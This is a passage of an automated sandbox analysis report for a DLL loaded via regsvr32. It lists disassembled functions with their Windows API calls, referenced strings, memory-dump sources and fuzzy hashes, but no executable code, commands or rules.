Instruction Fuzzy Hash: 8FB21B369120218FE70ADFACDED5F257BA6F794608747B21FC4018737ADE306464CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 10003440, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 100033F0: _malloc.LIBCMT ref: 100033F9

_malloc.LIBCMT ref: 100034B7

Strings

+';, xrefs: 10003440

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: _malloc
String ID: +';
API String ID: 1579825452-2694261586
Opcode ID: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
Instruction ID: 6db3f6523064f320fd84e53d4013fc8a18f56f5699846b59c9fd9a4c566afa3d
Opcode Fuzzy Hash: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
Instruction Fuzzy Hash: B891E770E04649AFDB09CF98C490AAEBBB2FF85345F24C199D915AB359C335AA90CF44

Uniqueness

Uniqueness Score: -1.00%

Function 10002690, Relevance: 3.1, APIs: 2, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00000000,?,00004000,?,10002928,00000001,00000000,?,100030A8,?,?,?,?,100030A8,00000000,00000000), ref: 10002704

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
Instruction ID: e47a27f64338b3e84d430cb899d867ed3d67d72a97b2c0655aeaec8263a425f7
Opcode Fuzzy Hash: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
Instruction Fuzzy Hash: 8841B77461410AAFEB48CF58C490BA9B7B2FB88364F14C659EC1A9F355C731EE41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 100024D0, Relevance: 2.6, APIs: 2, Instructions: 115
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000303F,00000000), ref: 10002551
VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,1001DF0A,8B118BBC,?,1000303F,00000000,1001DF0A,?), ref: 100025CC

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
Instruction ID: f227e8c1e280d8d0b8d11f9a2f1445d4c625449e48c39147985fdcb30a9e5b67
Opcode Fuzzy Hash: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
Instruction Fuzzy Hash: FE51E9B4A0010AEFDB04CF94C990AAEB7F1FF48345F248598E905AB345D370EE91CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 10024BD0, Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch.LIBCMT ref: 10024BD7

Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F

Part of subcall function 1002AC5C: LocalAlloc.KERNEL32(00000040,?,?,1002AFE7,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AC66

Part of subcall function 100248E2: __EH_prolog3.LIBCMT ref: 100248E9

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocH_prolog3H_prolog3_catchLocal_malloc
String ID:
API String ID: 1104862767-0
Opcode ID: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
Instruction ID: a1f779584784c66b6c6d6693aa33ee417c0f7bf9ec3ebef889974536428868aa
Opcode Fuzzy Hash: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
Instruction Fuzzy Hash: 87317AB4A05B40CFD761CF69904125EFBF0FF94700FA08A1EA19A87791CB71A640CB15

Uniqueness

Uniqueness Score: -1.00%

Function 1001FB60, Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memcpy_s.LIBCMT ref: 1001FBE6

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-0
Opcode ID: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
Instruction ID: f5ed4905dd4460340b5ac9a4a0a7973f6bbe06acb99917e18be8531ceafe8f55
Opcode Fuzzy Hash: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
Instruction Fuzzy Hash: EA3197B4E0060ADFCB04DF98C891AAEB7B1FF88310F148699E915AB355D730AD41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1002B0BB, Relevance: 1.5, APIs: 1, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 1002B0C2

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8H_prolog3Throw
String ID:
API String ID: 3670251406-0
Opcode ID: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
Instruction ID: c80a5d1f5578f8721dbd374575b215f2d5835d67e27bcfac389e5dd05e3c6f9c
Opcode Fuzzy Hash: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
Instruction Fuzzy Hash: FE017C386006438BDB26DF64DC6172E76E2EB843A1FA2442EE9518B291EF359D41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 10008000, Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 1000800B

Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
Instruction ID: 9a20b1d8cf5172607ffba420905976db52b7852b2de11c78eab645b8586f80a8
Opcode Fuzzy Hash: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
Instruction Fuzzy Hash: BD012CB4D08158EBEB00CFA4D85569EBBB4FB00394F108895D9516B305D376AB18DB91

Uniqueness

Uniqueness Score: -1.00%

Function 100236CE, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 100236ED

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
Instruction ID: 890261fd43258a4c098dfe067f91bb2ba3d5f49a8a728e9457d7994589d2c75f
Opcode Fuzzy Hash: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
Instruction Fuzzy Hash: 4CE06D766006156BC700CB4AE408A46BBDCDFA13B0F56C466E808CB252CAB1E8048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002ACFB, Relevance: 1.5, APIs: 1, Instructions: 21
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch.LIBCMT ref: 1002AD02

Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
String ID:
API String ID: 1641187343-0
Opcode ID: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
Instruction ID: 3b67d6bb43f4ea54dfbebb57807521158ddd2742ca645746548a7aae3598e2fb
Opcode Fuzzy Hash: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
Instruction Fuzzy Hash: F3E04F386442069BE760DFA4D846B4DB6E0EF01762FA04628F9D1EB2C2DF70AD80DB15

Uniqueness

Uniqueness Score: -1.00%

Function 10035645, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,1002E896,00000001,?,?,?,1002EA0F,?,?,?,1004E6A8,0000000C,1002EACA), ref: 1003565A

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
Instruction ID: 0df5893edc33e170cd9319f6da52f4968d67da800731ff8b92bc7feba6a3d305
Opcode Fuzzy Hash: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
Instruction Fuzzy Hash: 17D05E329507559EF7029F716C49B223BDCE384A96F048436F80CC61A0E670C6418A04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10001160, Relevance: 10.6, APIs: 7, Instructions: 71networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,?), ref: 10001194
_memset.LIBCMT ref: 100011A8
htonl.WS2_32(00000000), ref: 100011C1
htons.WS2_32(?), ref: 100011D5
socket.WS2_32(00000002,00000002,00000000), ref: 100011EB
bind.WS2_32(?,?,00000010), ref: 10001210
setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 10001252

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
String ID:
API String ID: 1003240404-0
Opcode ID: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
Instruction ID: 8b71fe392eebb4791ef10e00b80357e65c28fbed0d3ec8f38f9f26760835bea4
Opcode Fuzzy Hash: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
Instruction Fuzzy Hash: D6317C74A01228AFE760CB54CC85BE9B7B4FF8A714F0041D8E949AB281CB71AD80DF55

Uniqueness

Uniqueness Score: -1.00%

Function 1002129B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

_strcpy_s.LIBCMT ref: 100212CD

Part of subcall function 100210FF: __CxxThrowException@8.LIBCMT ref: 10023B71
Part of subcall function 100210FF: __cftof.LIBCMT ref: 10023B88

Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 100212E5
__snwprintf_s.LIBCMT ref: 1002131A
LoadLibraryA.KERNEL32(?), ref: 10021355

Strings

LOC, xrefs: 100212C5

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8InfoLibraryLoadLocaleThrow__cftof__getptd_noexit__snwprintf_s_strcpy_s
String ID: LOC
API String ID: 1016519223-519433814
Opcode ID: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
Instruction ID: e5882df6752d869781cd97db702e75e799ef83d3d4dcb43d327d0f518dc3dfd8
Opcode Fuzzy Hash: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
Instruction Fuzzy Hash: A021063990121CAFDB11EBA0EC46BDD33EEEB05751F9004A1FA04DB491DB70AE45C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 10021183, Relevance: 4.5, APIs: 3, Instructions: 40COMMON

Download Yara Rule

APIs

LoadResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 1002118E
LockResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 1002119C
SizeofResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 100211AE

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$LoadLockSizeof
String ID:
API String ID: 2853612939-0
Opcode ID: 8b420e262c7312fbbd320bda05a88a884026fa2b8a5d750ea2b9a6c299d0f1d4
Instruction ID: 5885e8a255633e1cc81cd5e62f2e9d9df206611330dfebe0406f5a0ab521e5b9
Opcode Fuzzy Hash: 8b420e262c7312fbbd320bda05a88a884026fa2b8a5d750ea2b9a6c299d0f1d4
Instruction Fuzzy Hash: 7FF0F03A60013BA7CF219F69FC044E97BD5FF107E67414425FEA9C2060E231D870D680

Uniqueness

Uniqueness Score: -1.00%

Function 100250A3, Relevance: 4.5, APIs: 3, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d3cc7cabb4d58ad44b84df687ee6d4ed92987b137f1ec63db657d71093bb1ad
Instruction ID: 0d7c4b7ad1d73a1697217a780c63f05e975ccc5f711293de909a3a3b9b9d2103
Opcode Fuzzy Hash: 8d3cc7cabb4d58ad44b84df687ee6d4ed92987b137f1ec63db657d71093bb1ad
Instruction Fuzzy Hash: 16F0A431600109ABDF11DF60DD88A9E7FB8FF05346F908021FC1AC5061DB32CA55EB99

Uniqueness

Uniqueness Score: -1.00%

Function 10001280, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,00000400,00000000,?,00000010), ref: 100012CF

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
Opcode ID: cdd5b8fa6bd2be514b31e1496784718f03a02615474b077ae9b11ea931df357f
Instruction ID: 69fb0fddd724ab168ece224e86e76236123086ad7b1ad86b3e1ae6067053412b
Opcode Fuzzy Hash: cdd5b8fa6bd2be514b31e1496784718f03a02615474b077ae9b11ea931df357f
Instruction Fuzzy Hash: 1B0125B5A0011C9FDB14CF58CD54BEEBBB9FF88304F4045A9E609A7241D7B46A84CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 100214CB, Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 158libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 100214D5
GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
ConvertDefaultLocale.KERNEL32(?), ref: 10021555
ConvertDefaultLocale.KERNEL32(?), ref: 10021563
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100215CD
EnumResourceLanguagesA.KERNEL32 ref: 100215EA
ConvertDefaultLocale.KERNEL32(?), ref: 1002161D
ConvertDefaultLocale.KERNEL32(00000000), ref: 10021626
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
_memset.LIBCMT ref: 10021689

Strings

GetSystemDefaultUILanguage, xrefs: 10021565
GetUserDefaultUILanguage, xrefs: 1002150D
ntdll.dll, xrefs: 100215C8
kernel32.dll, xrefs: 100214EE

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 3537336938-2299501126
Opcode ID: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
Instruction ID: 3754a4cc769aa270db1ce7901eb040107ed5b3d0b04ae9dca27c5b132e5f9257
Opcode Fuzzy Hash: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
Instruction Fuzzy Hash: 77515974C002289BCB61DF659C44BEDBAF4EB59300F5002EAE988E3291DB749E81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 10034610, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,1004E800,0000000C,1003474B,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 10034622
__crt_waiting_on_module_handle.LIBCMT ref: 1003462D

Part of subcall function 1003065C: Sleep.KERNEL32(000003E8,00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 10030668
